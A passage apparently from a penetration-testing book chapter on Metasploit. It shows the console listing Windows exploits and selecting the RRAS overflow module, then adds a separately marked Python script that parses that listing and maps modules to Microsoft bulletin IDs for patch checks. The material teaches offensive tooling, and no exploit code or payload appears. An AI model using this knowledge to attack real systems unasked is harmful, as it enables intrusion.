Metasploit can pair any Windows exploit with any Windows payload. So we can
choose to use the RRAS vulnerability to open a command shell, create an administrator,
start a remote VNC session, or do a bunch of other stuff. Let's get started.
$ ./msfconsole
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
=[ msf v3.0
+ -- --=[ 177 exploits - 104 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 30 aux
msf >
Chapter 4: Using Metasploit
77
PART II
The interesting commands to start with are
show
info
use
Other commands can be found by typing help. Our first task will be to find the name
of the RRAS exploit so we can use it:
msf > show exploits
Exploits
========
Name Description
---- -----------
...
windows/smb/ms04_011_lsass Microsoft LSASS Service
DsRolerUpgradeDownlevelServer Overflow
windows/smb/ms04_031_netdde Microsoft NetDDE Service
Overflow
windows/smb/ms05_039_pnp Microsoft Plug and Play Service
Overflow
windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN
Registry Overflow
windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi Microsoft Server Service
NetpwPathCanonicalize Overflow
...
There it is! Metasploit calls it windows/smb/ms06_025_rras.
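Scrolling a listing of 177 exploits by eye gets old quickly, and the console wraps long descriptions onto a second line with no module name in front of them, which also defeats a naive grep. The following is an added example, not code from the book or from the Metasploit project: a small Python parser for the show exploits listing that re-joins wrapped description lines, searches name and description for a keyword, and pulls the Microsoft bulletin ID (for example MS06-025) out of a module name so an administrator can check whether the matching patch is deployed. The listing embedded in the script is a constructed sample in the same layout as the output above, and the column-based continuation rule is an assumption about that layout.

```python
import re

# Constructed sample of `show exploits` output, in the wrapped form the console
# prints: a description that does not fit on one line continues on the next
# line, indented past the Name column and with no module path in front of it.
SAMPLE_LISTING = """\
Exploits
========

   Name                              Description
   ----                              -----------
   windows/smb/ms04_011_lsass        Microsoft LSASS Service
                                     DsRolerUpgradeDownlevelServer Overflow
   windows/smb/ms06_025_rasmans_reg  Microsoft RRAS Service RASMAN
                                     Registry Overflow
   windows/smb/ms06_025_rras         Microsoft RRAS Service Overflow
   windows/smb/ms06_040_netapi       Microsoft Server Service
                                     NetpwPathCanonicalize Overflow
"""

# A module line starts with a slash-separated path such as windows/smb/ms06_025_rras.
MODULE_RE = re.compile(r"^\s*([a-z0-9_]+(?:/[a-z0-9_]+)+)\s+(.*\S)\s*$")
# Module names for Microsoft issues embed the bulletin ID as msYY_NNN.
BULLETIN_RE = re.compile(r"ms(\d{2})_(\d{3})")


def parse_listing(text):
    """Return a list of (module_name, description) tuples from console output.

    Header lines (Exploits, ====, Name/----) never match MODULE_RE and are
    skipped. A line that carries no module path but is indented deeper than
    the Name column is treated as the continuation of the previous description
    (assumed layout rule, matching how the console wraps long descriptions)."""
    modules = []
    name_col = None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = MODULE_RE.match(line)
        if m:
            if name_col is None:
                name_col = m.start(1)  # remember where the Name column begins
            modules.append([m.group(1), m.group(2)])
        elif modules and name_col is not None:
            indent = len(line) - len(line.lstrip())
            if indent > name_col:
                modules[-1][1] += " " + line.strip()
    return [tuple(entry) for entry in modules]


def find_modules(modules, keyword):
    """Case-insensitive search over module name and description, like grep."""
    kw = keyword.lower()
    return [name for name, desc in modules
            if kw in name.lower() or kw in desc.lower()]


def bulletin_id(module_name):
    """Return the Microsoft bulletin ID encoded in a module name (e.g. MS06-025),
    or None if the name carries none. Handy for checking patch status."""
    m = BULLETIN_RE.search(module_name)
    return f"MS{m.group(1)}-{m.group(2)}" if m else None


if __name__ == "__main__":
    mods = parse_listing(SAMPLE_LISTING)
    for name in find_modules(mods, "rras"):
        print(f"{name:36} bulletin={bulletin_id(name)}")
```

Paste real console output into SAMPLE_LISTING (or read it from a file) and the same three functions apply; with the sample above, searching for "rras" returns both MS06-025 modules and maps them to the bulletin whose patch closes the hole.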